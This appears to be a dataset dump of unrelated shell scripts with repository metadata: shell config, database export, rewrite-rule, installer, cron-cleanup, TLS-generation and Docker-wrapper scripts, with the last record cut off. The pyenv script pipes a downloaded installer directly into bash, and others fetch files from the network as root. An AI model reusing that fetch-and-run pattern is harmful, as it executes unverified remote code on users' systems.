setopt INC_APPEND_HISTORY # Write to the history file immediately, not when the shell exits.
setopt HIST_FIND_NO_DUPS # Do not display a previously found event.
setopt HIST_IGNORE_SPACE # Do not record an event starting with a space.
setopt HIST_VERIFY # Do not execute immediately upon history expansion.
setopt HIST_EXPIRE_DUPS_FIRST # Expire duplicate entries first when trimming history.
setopt NO_LIST_BEEP
setopt AUTO_CD
bindkey -e
zstyle ':completion:*' rehash true
# Use caching to make completion for commands such as dpkg and apt usable.
zstyle ':completion::complete:*' use-cache on
zstyle ':completion::complete:*' cache-path "${ZDOTDIR:-$HOME}/.zcompcache"
# Case-insensitive (all), partial-word, and then substring completion.
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
# Group matches and describe.
zstyle ':completion:*:*:*:*:*' menu select
# Don't complete unavailable commands.
zstyle ':completion:*:functions' ignored-patterns '(_*|pre(cmd|exec))'
# History
zstyle ':completion:*:history-words' remove-all-dups yes
unsetopt CASE_GLOB
# ------------------ Custom Settings ------------------
# Substring keybindings
if [[ -n "$key_info" ]]; then
# Emacs
bindkey -M emacs "$key_info[Control]P" history-substring-search-up
bindkey -M emacs "$key_info[Control]N" history-substring-search-down
# Emacs and Vi
for keymap in 'emacs' 'viins'; do
bindkey -M "$keymap" "$key_info[Up]" history-substring-search-up
bindkey -M "$keymap" "$key_info[Down]" history-substring-search-down
done
fi
autoload -z edit-command-line
zle -N edit-command-line
bindkey "^X^E" edit-command-line
[ -f "$HOME/.fzf.zsh" ] && source "$HOME/.fzf.zsh"
export ZSH_AUTOSUGGEST_STRATEGY=(history completion)
eval "$(direnv hook zsh)"
# ------------------ PLUGINS ----------------------
ZPLUGINDIR="$HOME/.config/zsh/plugins"
if [[ ! -d "$ZPLUGINDIR/zsh_unplugged" ]]; then
git clone --quiet https://github.com/mattmc3/zsh_unplugged "$ZPLUGINDIR/zsh_unplugged"
fi
source "$ZPLUGINDIR/zsh_unplugged/zsh_unplugged.plugin.zsh"
repos=(
agkozak/zsh-z
zsh-users/zsh-completions
zsh-users/zsh-autosuggestions
Aloxaf/fzf-tab
zsh-users/zsh-syntax-highlighting
zsh-users/zsh-history-substring-search
)
plugin-load $repos
test -e "${HOME}/.iterm2_shell_integration.zsh" && source "${HOME}/.iterm2_shell_integration.zsh"
| true
|
718e47a85ca57173af00df225855d88251f9593d
|
Shell
|
rzygler/old-sysadmin-scripts
|
/mysql/export/export_db_tables.sh
|
UTF-8
| 594
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
###
### Dump table structure and data
###
### @author Rich Zygler
###
### vars to hold program locations
PROG_CAT="/bin/cat"
PROG_DATE="/bin/date"
PROG_MYSQLDUMP="/usr/bin/mysqldump"
### other vars
DATA_FILE="/home/rzygler/scripts/db_tables_to_export.txt"
OUT_FILE="/home/rzygler/scripts/export.sql"
### fill these in for the database we are dumping from
DB=""
USERNAME=""
PASSWORD=""
HOST=""
###
TABLES=""
for line in `$PROG_CAT $DATA_FILE`;
do
TABLES="${TABLES} ${line}"
done
# --no-data
$PROG_MYSQLDUMP -u $USERNAME -p${PASSWORD} -h $HOST $DB $TABLES > $OUT_FILE
| true
|
189aa40ba9e2b98754b59be2e6a5af83d43037ab
|
Shell
|
wasuaje/clasideu
|
/micrositios/hdl_micrositios2.sh
|
UTF-8
| 2,602
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
# Argumentos = -p proyecto -m micrositio -a accion [A]ctivar | [D]esactivar
# Para trabajar con micrositios usar hdl_micrositios -m nombrelmicrositio -a A (para activar) ó
# hdl_micrositios -m nombrelmicrositio -a D (para desactivar)
#
# Para trabajar con proyectos usar hdl_micrositios -m nombrelmicrositio -p nombre del proyecto -a A (para activar) ó
# hdl_micrositios -m nombrelmicrositio -a D (para desactivar)
#
#Texto estandar a mostrar en caso de usar la ayuda o si hay un error en los parametros
usage()
{
cat << EOF
Utilizacion: $0 opciones
Este script automatiza el proceso de activar/desactivar proyectos y micrositios.
OPTIONS:
-h Muestra este mensaje
-p Proyecto
-m Micrositio
-a Accion a realizar solo acepta A o D
EOF
}
PROYECTO=
MICROSITIO=
ACCION=
while getopts "hp:m:a:" OPTION
do
case $OPTION in
h)
usage
exit 1
;;
p)
PROYECTO=$OPTARG
;;
m)
MICROSITIO=$OPTARG
;;
a)
ACCION=$OPTARG
;;
?)
usage
exit
;;
esac
done
# siempre debe haber al menos un micrositio y una accion a realizar
if [[ -z $MICROSITIO ]] || [[ -z $ACCION ]]
then
usage
exit 1
fi
#tacitamente al enviar un proyecto y un micrositio estoy usando el archivo de proyectos
if [[ ! -z $PROYECTO ]] && [[ ! -z $MICROSITIO ]]
then
if [ $ACCION = A ] #si estoy activando
then
echo "RewriteRule ^/micrositio/$MICROSITIO/$PROYECTO.*$ http://clasificados.eluniversal.com/inmuebles/nuevosproyectos.shtml [R,L]" >> proyectosInactivos.conf
fi
if [ $ACCION = D ] # si estoy desactivando
then
sed /$MICROSITIO.*$PROYECTO/d proyectosInactivos.conf > proyectosInactivos.conf.tmp
mv proyectosInactivos.conf proyectosInactivos.conf.bkp
mv proyectosInactivos.conf.tmp proyectosInactivos.conf
fi
fi
#si el proyecto esta vacio y el micrositio no estoy usando el archivo de micrositios
if [[ -z $PROYECTO ]] && [[ ! -z $MICROSITIO ]]
then
if [ $ACCION = A ] #si estoy activando
then
echo "RewriteRule ^/micrositio/$MICROSITIO/.*$ http://clasificados.eluniversal.com/inmuebles/micrositios.shtml [R,L]" >> micrositiosInactivos.conf
fi
if [ $ACCION = D ] # si estoy desactivando
then
sed /$MICROSITIO/d micrositiosInactivos.conf > micrositiosInactivos.conf.tmp
mv micrositiosInactivos.conf micrositiosInactivos.conf.bkp
mv micrositiosInactivos.conf.tmp micrositiosInactivos.conf
fi
fi
| true
|
f831f4fed5285f3f005550089337ce2743c48ce8
|
Shell
|
cdelimitrou/charmander
|
/bin/invm/deploy_scheduler.sh
|
UTF-8
| 603
| 3.078125
| 3
|
[
"MIT"
] |
permissive
|
#/bin/bash
set -e
DIR=$PWD
UPSTART=/etc/init/charmander-scheduler.conf
export PATH=$PATH:/usr/local/go/bin
export GOPATH=$DIR
if [ -e $UPSTART ]; then
if ( initctl status charmander-scheduler | grep start ); then
initctl stop charmander-scheduler
fi
fi
go get -u github.com/att-innovate/charmander-scheduler
go install -a github.com/att-innovate/charmander-scheduler
cp $DIR/bin/charmander-scheduler /usr/local/bin/
if [ -e $UPSTART ]; then
initctl start charmander-scheduler
else
cp /vagrant/bin/invm/charmander-scheduler.conf /etc/init/
initctl start charmander-scheduler
fi
| true
|
ddfdcea217c703c49ca05049a1d6f6c7fca9e65f
|
Shell
|
swiftycloud/swifty
|
/deps.sh
|
UTF-8
| 1,945
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ "x${GOPATH}" != "x$(pwd)/vendor:$(pwd)" ]; then
echo "Set GOPATH to $(pwd)/vendor:$(pwd)"
exit 1
fi
VGOPATH="$(pwd)/vendor"
if [ -d "${VGOPATH}/src" ]; then
echo "Vendor is populated"
exit 0
fi
set -x
set -e
# We need 6.0.0 version of the k8s client libs. When built, the lib
# gets the protobuf library of some given version, which is SUDDENLY
# incompatible with prometheus client lib. The latter need protobuf
# of version 1.1.0. Thus, we first download the k8s, then checkout
# it to 6.0.0, then fetch the Godep-s of it, then fiv protobuf version
# to be 1.1.1, then install k8s, then proceed with the rest.
if which yum ; then
yum install -y golang patch librados2-devel glibc-headers glibc-static
yum groupinstall -y "Development Libraries"
elif which apt-get ; then
apt-get install -y golang librados-dev
fi
go get github.com/tools/godep
if [ "x$USER" = "xroot" ] ; then
cp ${VGOPATH}/bin/godep /usr/bin
else
case :$PATH: # notice colons around the value
in *:$HOME/bin:*) ;; # do nothing, it's there
*) echo "$HOME/bin not in $PATH" >&2; exit 0 ;;
esac
cp ${VGOPATH}/bin/godep $HOME/bin
fi
go get -d k8s.io/client-go/...
cd ${VGOPATH}/src/k8s.io/client-go
git checkout -b swy6.0.0 v6.0.0
godep restore ./...
cd -
git -C ${VGOPATH}/src/github.com/golang/protobuf checkout -b swy1.1.0 v1.1.0
go install k8s.io/client-go/...
go get github.com/prometheus/client_golang/prometheus
go get github.com/go-sql-driver/mysql
go get github.com/gorilla/mux
go get github.com/gorilla/websocket
go get gopkg.in/yaml.v2
go get github.com/michaelklishin/rabbit-hole
go get github.com/streadway/amqp
go get go.uber.org/zap
go get gopkg.in/mgo.v2
go get -d gopkg.in/robfig/cron.v2;
patch -d${VGOPATH}/src/gopkg.in/robfig/cron.v2 -p1 < $(pwd)/contrib/robfig-cron.patch;
go install gopkg.in/robfig/cron.v2
go get code.cloudfoundry.org/bytefmt
go get github.com/ceph/go-ceph/rados # this gent is broken in deb, so last
| true
|
d6260124516be41fbf32d10bbe5efc3981de07ac
|
Shell
|
jimscratch/linux-comfy-chair
|
/modules/python.sh
|
UTF-8
| 1,630
| 3.046875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# python.sh
# next install python (both 2.x and 3.x trees) using Pyenv
# will probably stop installing python2 in the near future as it is EOL.
curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv-installer | bash
# install a couple of plugins...
git clone git://github.com/yyuu/pyenv-pip-migrate.git ~/.pyenv/plugins/pyenv-pip-migrate
git clone https://github.com/yyuu/pyenv-ccache.git ~/.pyenv/plugins/pyenv-ccache
git clone https://github.com/jawshooah/pyenv-default-packages.git ~/.pyenv/plugins/pyenv-default-packages
# set up a default-packages file for python libraries to install with each new python or venv ...
# for now, just a few that allow my vscode settings to work easier.
echo $'wheel\npylint\nblack\nflake8\n' > ~/.pyenv/default-packages
if ! grep -qc 'pyenv init' ~/.bashrc ; then
echo "## Adding pyenv to .bashrc ##"
echo >> ~/.bashrc
echo "# Set up Pyenv" >> ~/.bashrc
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init --path)"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
echo 'eval "$(pyenv virtualenv-init -)"' >> ~/.bashrc
fi
# run the above locally to use in this shell
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init --path)"
eval "$(pyenv init -)"
pyenv install 2.7.18
pyenv install 3.9.6
# 'python' and 'python3' target 3.9.6 while 'python2' targets 2.7.18
pyenv global 3.9.6 2.7.18
# now update 'pip' in both versions ...
python2 -m pip install --upgrade pip
python3 -m pip install --upgrade pip
| true
|
1ace00c792592afc094ed20dca41826eaf521edf
|
Shell
|
abenxiang/vpstoolbox_clone
|
/install/qbt-origin.sh
|
UTF-8
| 1,516
| 2.953125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
## Qbt_origin模组 Qbt_origin moudle
install_qbt_o(){
set +e
clear
TERM=ansi whiptail --title "安装中" --infobox "安装Qbt原版中..." 7 68
colorEcho ${INFO} "安装原版Qbittorrent(Install Qbittorrent ing)"
if [[ ${dist} == debian ]]; then
apt-get update
apt-get install qbittorrent-nox -y
elif [[ ${dist} == ubuntu ]]; then
add-apt-repository ppa:qbittorrent-team/qbittorrent-stable -y
apt-get install qbittorrent-nox -y
else
echo "fail"
fi
#useradd -r qbittorrent --shell=/usr/sbin/nologin
cat > '/etc/systemd/system/qbittorrent.service' << EOF
[Unit]
Description=qBittorrent Daemon Service
Documentation=https://github.com/c0re100/qBittorrent-Enhanced-Edition
Wants=network-online.target
After=network-online.target nss-lookup.target
[Service]
Type=simple
User=root
RemainAfterExit=yes
ExecStart=/usr/bin/qbittorrent-nox --profile=/usr/share/nginx/
TimeoutStopSec=infinity
LimitNOFILE=65536
Restart=on-failure
RestartSec=3s
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable qbittorrent.service
mkdir /usr/share/nginx/qBittorrent/
mkdir /usr/share/nginx/qBittorrent/downloads/
mkdir /usr/share/nginx/qBittorrent/data/
mkdir /usr/share/nginx/qBittorrent/data/GeoIP/
cd /usr/share/nginx/qBittorrent/data/GeoIP/
curl -LO --progress-bar https://raw.githubusercontent.com/johnrosen1/vpstoolbox/master/binary/GeoLite2-Country.mmdb
cd
chmod 755 /usr/share/nginx/
chown -R nginx:nginx /usr/share/nginx/
systemctl restart qbittorrent.service
}
| true
|
5e199c1b3adbbc07389bf0f515aa625128f73f14
|
Shell
|
wate123/2d_game
|
/changeTime.sh
|
UTF-8
| 72
| 2.59375
| 3
|
[] |
no_license
|
while [ 1 ]
do
OUTPUT=$(date +%m%d%H%M%Y)
$OUTPUT
sleep 3s
done
| true
|
05d50c6bdb0cf04c47c661baf7dbc39fdfc393f8
|
Shell
|
Azariagmt/shell-practice-files
|
/ask
|
UTF-8
| 239
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
#read name and age
echo "Please enter your name"
read name
echo "and your age please!"
read age
if test $age -ge 18
then
echo "Hello $name you can vote and drink now!"
else
echo "Hello $name you are $age, still a bwabyy!"
fi
| true
|
d96d62dac1d03dfe95c8beb083e6b7e74874108f
|
Shell
|
cloudera/hue
|
/tools/ops/hue_history_cron.sh
|
UTF-8
| 4,093
| 3.359375
| 3
|
[
"CC-BY-3.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0",
"Unlicense",
"LGPL-3.0-only",
"CC0-1.0",
"LicenseRef-scancode-other-permissive",
"CNRI-Python",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"Python-2.0",
"GPL-3.0-only",
"CC-BY-4.0",
"LicenseRef-scancode-jpython-1.1",
"AFL-2.1",
"JSON",
"WTFPL",
"MIT",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-jython",
"GPL-3.0-or-later",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LGPL-3.0-or-later",
"Zlib",
"LicenseRef-scancode-free-unknown",
"Classpath-exception-2.0",
"LicenseRef-scancode-proprietary-license",
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"MPL-2.0",
"ISC",
"GPL-2.0-only",
"ZPL-2.1",
"BSL-1.0",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Xnet",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#Cleans up old oozie workflow and beeswax savedqueries to
#prevent the DB from getting too large.
PARCEL_DIR=/opt/cloudera/parcels/CDH
LOG_FILE=/var/log/hue/`basename "$0" | awk -F\. '{print $1}'`.log
LOG_ROTATE_SIZE=10 #MB before rotating, size in MB before rotating log to .1
LOG_ROTATE_COUNT=2 #number of log files, so 20MB max
DATE=`date '+%Y%m%d-%H%M'`
KEEP_DAYS=7 #Number of days of beeswax and oozie history to keep
if [ ! -d "/usr/lib/hadoop" ]
then
CDH_HOME=$PARCEL_DIR
else
CDH_HOME=/usr
fi
if [ -d "/var/run/cloudera-scm-agent/process" ]
then
HUE_CONF_DIR="/var/run/cloudera-scm-agent/process/`ls -1 /var/run/cloudera-scm-agent/process | grep HUE | sort -n | tail -1 `"
else
HUE_CONF_DIR="/etc/hue/conf"
fi
if [ -d "${CDH_HOME}/lib/hue/build/env/bin" ]
then
COMMAND="${CDH_HOME}/lib/hue/build/env/bin/hue shell"
else
COMMAND="${CDH_HOME}/share/hue/build/env/bin/hue shell"
fi
ORACLE_HOME=/opt/cloudera/parcels/ORACLE_INSTANT_CLIENT/instantclient_11_2/
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${ORACLE_HOME}
export CDH_HOME HUE_CONF_DIR ORACLE_HOME LD_LIBRARY_PATH COMMAND
${COMMAND} >> /dev/null 2>&1 <<EOF
from beeswax.models import SavedQuery
from datetime import date, timedelta
from oozie.models import Workflow
from django.db.utils import DatabaseError
import logging
import logging.handlers
import sys
LOGFILE="${LOG_FILE}"
keepDays = ${KEEP_DAYS}
deleteRecords = 900
errorCount = 0
log = logging.getLogger('')
log.setLevel(logging.INFO)
format = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
fh = logging.handlers.RotatingFileHandler(LOGFILE, maxBytes=(1048576*${LOG_ROTATE_SIZE}), backupCount=${LOG_ROTATE_COUNT})
fh.setFormatter(format)
log.addHandler(fh)
log.info('HUE_CONF_DIR: ${HUE_CONF_DIR}')
log.info("Cleaning up anything in the Hue tables oozie*, desktop* and beeswax* older than ${KEEP_DAYS} old")
savedQuerys = SavedQuery.objects.filter(is_auto=True, mtime__lte=date.today() - timedelta(days=keepDays))
totalQuerys = savedQuerys.count()
loopCount = totalQuerys
deleteCount = deleteRecords
log.info("SavedQuerys left: %s" % totalQuerys)
log.info("Looping through querys")
while loopCount > 0:
if loopCount < deleteCount:
deleteCount = loopCount
excludeCount = loopCount - deleteCount
savedQuerys = SavedQuery.objects.filter(is_auto=True, mtime__lte=date.today() - timedelta(days=keepDays))[:excludeCount].values_list("id", flat=True)
try:
SavedQuery.objects.exclude(pk__in=list(savedQuerys)).delete()
loopCount -= deleteCount
errorCount = 0
deleteCount = deleteRecords
except DatabaseError, e:
log.info("Non Fatal Exception: %s: %s" % (e.__class__.__name__, e))
errorCount += 1
deleteCount = 1
if errorCount > 9:
raise
log.info("querys left: %s" % loopCount)
workflows = Workflow.objects.filter(is_trashed=True, last_modified__lte=date.today() - timedelta(days=keepDays))
totalWorkflows = workflows.count()
loopCount = 1
maxCount = 1000
log.info("Workflows left: %s" % totalWorkflows)
log.info("Looping through workflows")
for w in workflows:
w.delete(skip_trash=True)
loopCount += 1
if loopCount == maxCount:
totalWorkflows = totalWorkflows - maxCount
loopCount = 1
log.info("Workflows left: %s" % totalWorkflows)
EOF
| true
|
59a8feff9eccc0f36e4f15ed1a7cde96d87e9f37
|
Shell
|
httplib2/httplib2
|
/script/generate-tls
|
UTF-8
| 2,232
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -eu
target_dir="${1:-.}"
days=7300
rsa_bits=2048
org="httplib2-test"
server_cn="localhost"
subj_prefix="/C=ZZ/ST=./L=./O=$org/OU=."
main() {
cd "$target_dir"
gen
check
}
check() {
echo "- check keys" >&2
openssl rsa -in ca.key -check -noout
openssl rsa -in client.key -check -noout
openssl rsa -in client_encrypted.key -check -noout -passin pass:12345
openssl rsa -in server.key -check -noout
echo "- check certs" >&2
for f in *.pem ; do
openssl x509 -in "$f" -checkend 3600 -noout
done
}
gen() {
echo "- generate keys, if absent" >&2
[[ -f ca.key ]] || openssl genrsa -out ca.key $rsa_bits
[[ -f client.key ]] || openssl genrsa -out client.key $rsa_bits
[[ -f client_encrypted.key ]] || openssl rsa -in client.key -out client_encrypted.key -aes128 -passout pass:12345
[[ -f server.key ]] || openssl genrsa -out server.key $rsa_bits
echo "- generate CA" >&2
openssl req -batch -new -nodes -x509 -days $days -subj "$subj_prefix/CN=$org-CA" -key ca.key -out ca.pem
openssl req -batch -new -nodes -x509 -days $days -subj "$subj_prefix/CN=$org-CA-unused" -key ca.key -out ca_unused.pem
echo "- generate client cert" >&2
openssl req -batch -new -nodes -out tmp.csr -key client.key -subj "$subj_prefix/CN=$org-client"
openssl x509 -req -in tmp.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out client.crt -days $days -serial -fingerprint
cat client.crt client.key >client.pem
cat client.crt ca.pem client.key >client_chain.pem
echo "- generate encrypted client cert" >&2
openssl req -batch -new -nodes -out tmp.csr -key client_encrypted.key -passin pass:12345 -subj "$subj_prefix/CN=$org-client-enc"
openssl x509 -req -in tmp.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out client_encrypted.crt -days $days -serial -fingerprint
cat client_encrypted.crt client_encrypted.key >client_encrypted.pem
echo "- generate server cert" >&2
openssl req -batch -new -nodes -out tmp.csr -key server.key -subj "$subj_prefix/CN=$server_cn"
openssl x509 -req -in tmp.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.crt -days $days -serial -fingerprint
cat server.crt server.key >server.pem
cat server.crt ca.pem server.key >server_chain.pem
rm tmp.csr
}
main
| true
|
4ddd18dc824f792b1b8b0651b6f0a8e835f402a3
|
Shell
|
ajprax/bento-cluster
|
/bin/bento
|
UTF-8
| 11,035
| 3.859375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# -*- coding: utf-8 -*-
# -*- mode: shell -*-
# (c) Copyright 2014 WibiData, Inc.
#
# See the NOTICE file distributed with this work for additional
# information regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
set -o nounset # Fail when referencing undefined variables
set -o errexit # Script exits on the first error
set -o pipefail # Pipeline status failure if any command fails
if [[ ! -z "${DEBUG:-}" ]]; then
source=$(basename "${BASH_SOURCE}")
PS4="# ${source}":'${LINENO}: '
set -x
fi
# ------------------------------------------------------------------------------
# Canonicalize a path into an absolute, symlink free path.
#
# Portable implementation of the GNU coreutils "readlink -f path".
# The '-f' option of readlink does not exist on MacOS, for instance.
#
# Args:
# param $1: path to canonicalize.
# Stdout:
# Prints the canonicalized path on stdout.
function resolve_symlink() {
local target_file=$1
if [[ -z "${target_file}" ]]; then
echo ""
return 0
fi
cd "$(dirname "${target_file}")"
target_file=$(basename "${target_file}")
# Iterate down a (possible) chain of symlinks
local count=0
while [[ -L "${target_file}" ]]; do
if [[ "${count}" -gt 1000 ]]; then
# Just stop here, we've hit 1,000 recursive symlinks. (cycle?)
break
fi
target_file=$(readlink "${target_file}")
cd $(dirname "${target_file}")
target_file=$(basename "${target_file}")
count=$(( ${count} + 1 ))
done
# Compute the canonicalized name by finding the physical path
# for the directory we're in and appending the target file.
local phys_dir=$(pwd -P)
echo "${phys_dir}/${target_file}"
}
# ------------------------------------------------------------------------------
bento_bin_path="${BASH_SOURCE:-$0}"
bento_bin_path=$(resolve_symlink "${bento_bin_path}")
BENTO_CLUSTER_HOME=$(dirname "$(dirname "${bento_bin_path}")")
BENTO_CLUSTER_HOME=$(cd "${BENTO_CLUSTER_HOME}"; pwd -P)
# ------------------------------------------------------------------------------
function print_tool_usage() {
echo "The bento script can start and stop Docker containers containing HDFS, YARN, ZooKeeper,"
echo "HBase and Cassandra services"
echo
echo "USAGE"
echo
echo " bento (create|start|stop|status|list|rm)"
echo
echo "COMMANDS"
echo
echo " help - Displays this help message. Use --verbose for more information."
echo " create - Create and start a new Bento container."
echo " start - Start a Bento container."
echo " stop - Stop a Bento container."
echo " status - Display the status of a Bento container."
echo " list - List all Bento containers."
echo " rm - Deletes a Bento container and all data."
echo " ip - Get the ip address of a Bento container."
echo " hostname - Get the host name of a Bento container."
echo " build - Build a new local Bento image for image development."
echo " pull - Pull the latest Bento image from docker hub."
echo " logs - Tail the Bento process logs."
echo " config - Dump config files in specified directory."
echo
echo "FLAGS (following the command)"
echo " all"
echo " -n Specify a container name. Defaults to 'bento'. The provided"
echo " name will be appended to 'bento-' to create the container name."
echo " create"
echo " -f Create container in foreground (will attach stdin/tty)."
echo " -r Remove the container on stop. Will start container in foreground."
echo " -h Do not modify environment for bento hostname resolution."
echo " -c Do not overwrite Hadoop & HBase client configuration."
echo " -o Directory to dump config files in."
echo " start"
echo " -h Do not modify environment for bento hostname resolution."
echo " -c Do not overwrite Hadoop & HBase client configuration."
echo " -o Directory to dump config files in."
echo " list"
echo " -a List all running and stopped Bento containers."
echo " config"
echo " -o Directory to dump config files in."
}
# ------------------------------------------------------------------------------
# Script main begins here:
if [[ -z ${1:-} ]]; then
print_tool_usage
exit 0
fi
# Locate the Docker binary:
# Ubuntu installs the docker binary as docker.io to avoid a conflict with another package:
if docker=$(which "docker.io"); then :
elif docker=$(which "docker"); then :
else
echo "Docker command-line tool not found : please install Docker."
exit 1
fi
# Ensure that Docker version is not less than 1.0.0.
docker_version=$($docker version | head -1 | cut -f 3 -d " ")
if [[ ${docker_version} < 1.0.0 ]] ; then
echo "Docker version should be 1.0.0 or above. Found version $docker_version." 1>&2
exit 1
fi
command=$1
shift # pop off the command
container_name=bento
daemon='-d'
edit_hosts=true
remove=""
client_config=true
all=''
client_config_dir=$BENTO_CLUSTER_HOME/client-conf
while getopts ":f :h :n: :r :a :o:" opt; do
case $opt in
f)
daemon='-it'
edit_hosts=false
client_config=false
;;
h)
edit_hosts=false
;;
n)
container_name="bento-${OPTARG}"
;;
r)
remove='--rm=true'
daemon='-it'
edit_hosts=false
client_config=false
;;
c)
client_config=false
;;
a)
all='-a'
;;
o)
client_config_dir="${OPTARG}"
;;
\?)
echo "Unknown option: -${OPTARG}" >&2
;;
esac
done
shift $((OPTIND-1))
function set_client_conf() {
HOST=$($docker inspect --format="{{.Config.Hostname}}" ${container_name})
if [[ "$client_config" == true ]]; then
echo "Adding address to Bento container '${container_name}' to local Hadoop & HBase client configurations." 1>&2
mkdir -p $client_config_dir/hadoop
mkdir -p $client_config_dir/hbase
echo "Writing client configuration files to ${client_config_dir} ..." 1>&2
sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/core-site.xml > \
$client_config_dir/hadoop/core-site.xml
sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/mapred-site.xml > \
$client_config_dir/hadoop/mapred-site.xml
sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/yarn-site.xml > \
$client_config_dir/hadoop/yarn-site.xml
sed "s/\$BENTO_HOST/$HOST/" $BENTO_CLUSTER_HOME/client-conf-template/hbase-site.xml > \
$client_config_dir/hbase/hbase-site.xml
else
echo "Not adding address to Bento container '${container_name}' to local Hadoop & HBase client configurations." 1>&2
fi
}
function update_hostname_resolution() {
if [[ "$edit_hosts" == true ]]; then
# Linux environments obey the HOSTALIASES environment variable.
# Other environments are required to modify /etc/hosts.
if [[ $(uname) == "Linux" ]]; then
echo "Adding Bento docker container host name to ${HOSTALIASES}." 1>&2
$BENTO_CLUSTER_HOME/bin/update-user-hosts $ADDRESS $HOST
else
echo "Adding container address and host to /etc/hosts:" 1>&2
$BENTO_CLUSTER_HOME/bin/update-etc-hosts $ADDRESS $HOST
fi
else
echo "Not adding container address and host to enviroment:" 1>&2
fi
}
case ${command} in
help)
print_tool_usage
exit 0
;;
create)
$docker run ${daemon} ${remove} --hostname ${container_name} --name ${container_name} kijiproject/bento-cluster $@
printf "Bento container '" 1>&2
printf ${container_name}
printf "' created and started." 1>&2
printf "\n"
ADDRESS=$($docker inspect --format="{{.NetworkSettings.IPAddress}}" ${container_name})
HOST=$($docker inspect --format="{{.Config.Hostname}}" ${container_name})
update_hostname_resolution
set_client_conf
;;
start)
if status=$($docker inspect --format="{{.State.Running}}" ${container_name} 2> /dev/null); then
if [[ $status == 'true' ]]; then
echo "Bento container '${container_name}' is already started." 1>&2
exit 1;
else
$docker start ${container_name} > /dev/null
printf "Bento container '" 1>&2;
printf ${container_name}
printf "' started." 1>&2;
printf "\n"
ADDRESS=$($docker inspect --format="{{.NetworkSettings.IPAddress}}" ${container_name})
HOST=$($docker inspect --format="{{.Config.Hostname}}" ${container_name})
update_hostname_resolution
set_client_conf
echo "Visit http://${HOST}:9001 to see the running services." 1>&2
echo "Useful Links:" 1>&2
echo " HDFS: http://${HOST}:50070" 1>&2
echo " HBase Master: http://${HOST}:60010" 1>&2
echo " YARN Resource Manager: http://${HOST}:8088" 1>&2
echo " DataStax OpsCenter : http://${HOST}:8888" 1>&2
fi
else
echo "Bento container '${container_name}' does not exist." 1>&2
exit 1;
fi
;;
stop)
$docker stop ${container_name} > /dev/null
echo "Bento container '${container_name}' stopped."
;;
rm)
$docker rm ${container_name} > /dev/null
echo "Bento container '${container_name}' removed."
;;
status)
if status=$($docker inspect --format="{{.State.Running}}" ${container_name} 2> /dev/null); then
printf "Bento container " 1>&2
if [[ $status == 'true' ]]; then
printf "started"
else
printf "stopped"
fi
printf "." 1>&2
printf "\n"
else
echo "Bento container '${container_name}' does not exist."
exit 1;
fi
;;
list)
$docker ps $all | awk 'NR==1 || /kijiproject\/bento/'
;;
ip)
echo $($docker inspect --format="{{.NetworkSettings.IPAddress}}" ${container_name})
;;
hostname)
echo $($docker inspect --format="{{.Config.Hostname}}" ${container_name})
;;
build)
$docker build -t "kijiproject/bento-cluster" ${BENTO_CLUSTER_HOME}/docker
;;
pull)
$docker pull kijiproject/bento-cluster
;;
logs)
$docker logs -f ${container_name}
;;
config)
if status=$($docker inspect --format="{{.State.Running}}" ${container_name} 2> /dev/null); then
set_client_conf
else
echo "Bento container '${container_name}' does not exist."
exit 1;
fi
;;
*)
echo "Unknown command: ${command}"
print_tool_usage
exit 1
;;
esac
| true
|
97ef08b3830f8e6c35f72c9b9bd2c72052f57fff
|
Shell
|
